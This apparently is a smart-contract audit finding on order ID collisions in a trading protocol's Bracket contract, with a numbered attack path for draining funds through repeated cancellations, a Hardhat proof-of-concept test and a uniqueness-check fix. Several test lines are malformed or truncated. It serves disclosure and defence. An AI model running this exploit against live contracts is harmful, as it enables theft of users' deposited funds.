Boxy Ash Ant
The protocol's order ID generation mechanism, which uses a combination of sender address and timestamp, is vulnerable to ID collisions when multiple orders are created within the same timestamp. This allows an attacker to overwrite order amounts while maintaining multiple references to the same order ID, enabling them to withdraw more funds than deposited through repeated cancellations.
The vulnerability stems from two critical issues. orderId is generated using timestamp and sender values. But different transactions can have the same timestamp or a contract can be implemented that creates multiple orders in the same transaction.
// In AutomationMaster.sol
function generateOrderId(address sender) public view returns (uint96) {
return uint96(uint256(keccak256(abi.encodePacked(sender, block.timestamp))));
Because of this the orders mapping gets overwritten with the latest order details. The pendingOrderIds array accumulates duplicate IDs.
// In Bracket.sol
// In Bracket.sol
mapping(uint96 => Order) public orders; // Stores order details
uint96[] public pendingOrderIds; // Stores order IDs for tracking
function createOrder(...) {
uint96 orderId = MASTER.generateOrderId(msg.sender);
// First issue: Overwrites existing order with same ID
orders[orderId] = Order({
amountIn: newAmount, // New amount overwrites old amount
tokenIn: newToken,
// ... other fields
// Second issue: Adds duplicate ID to pending orders
pendingOrderIds.push(orderId); // Adds same ID multiple times
No response
No response
- Attacker creates first order with small amount:
- Creates second order with large amount in same timestamp:
- Both orders reference same ID in pendingOrderIds
- Attacker cancels order multiple times or his orders filled multiple times
- Attacker receives large amount multiple times and drains the contract
Attacker can withdraw multiple times the deposited amount and drain the contract
//@note Enable the 'allowBlocksWithSameTimestamp' option
describe("Execute attac", () => {
const stopDelta = ethers.parseUnits("500", 8)
const strikeDelta = ethers.parseUnits("100", 8)
const strikeBips = 500
const stopBips = 5000
const swapInBips = 500
let orderId: BigInt
before(async () => {
//steal money for s.Bob
await stealMoney(s.usdcWhale, await s.Bob.getAddress(), await s.USDC.getAddress(), s.usdcAmount)
//reset test oracle price
await s.wethOracle.setPrice(s.initialEthPrice)
await s.usdcOracle.setPrice(s.initialUsdcPrice)
await s.uniOracle.setPrice(s.initialUniPrice)
await s.arbOracle.setPrice(s.initialArbPrice)
let initial = await s.Master.checkUpkeep("0x")
it("Create order in same timestamp", async () => {
const currentPrice = await s.Master.getExchangeRate(await s.WETH.getAddress(), await s.USDC.getAddress())
await s.USDC.connect(s.Bob).approve(await s.Bracket.getAddress(), s.usdcAmount)
const randomTokenOut = ethers.Wallet.createRandom().address
await s.WETH.connect(s.Bob).approve(await s.Bracket.getAddress(), 10n * s.wethAmount)
const timestamp = Math.floor( / 1000)
await network.provider.send("evm_setNextBlockTimestamp", [timestamp])
// @ deposit small amount first and bigger amount after
let amount1 = ethers.parseEther("0.1")
let amount2 = ethers.parseEther("1")
await s.Bracket.connect(s.Bob).createOrder(
currentPrice + strikeDelta,
currentPrice - stopDelta,
await s.WETH.getAddress(),
await s.USDC.getAddress(),
await s.Bob.getAddress(),
5,//5 bips fee
false,//no permit
//Use the same timestamp
await network.provider.send("evm_setNextBlockTimestamp", [timestamp])
await s.Bracket.connect(s.Bob).createOrder(
currentPrice + strikeDelta,
currentPrice - stopDelta,
await s.WETH.getAddress(),
await s.USDC.getAddress(),
await s.Bob.getAddress(),
5,//5 bips fee
false,//no permit
const filter = s.Bracket.filters.OrderCreated
const events = await s.Bracket.queryFilter(filter, -1)
const event = events[0].args
orderId = event[0]
expect(Number(event[0])).to.not.eq(0, "Third order")
//verify pending order exists
const list = await s.Bracket.getPendingOrders()
expect(list[0]).to.eq(orderId, "First order Id")
expect(list[1]).to.eq(orderId, "First order Id")
await stealMoney(s.wethWhale, await s.Bracket.getAddress(), await s.WETH.getAddress(), s.wethAmount)
const balance = await s.WETH.balanceOf(await s.Bracket.getAddress())
expect(balance) + amount2 + s.wethAmount, "WETH received")
await s.Bracket.connect(s.Bob).cancelOrder(orderId.toString())
await s.Bracket.connect(s.Bob).cancelOrder(orderId.toString())
// User deosited 0.1 + 1 eth and when canceled recieved 2 eth
const balanceAfter = await s.WETH.balanceOf(await s.Bracket.getAddress())
expect(balanceAfter) + amount1 - amount2, "WETH received")
Imlement different system for orderId creation and add order ID uniqueness check
require(orders[orderId].amountIn == 0, "Order ID already exists");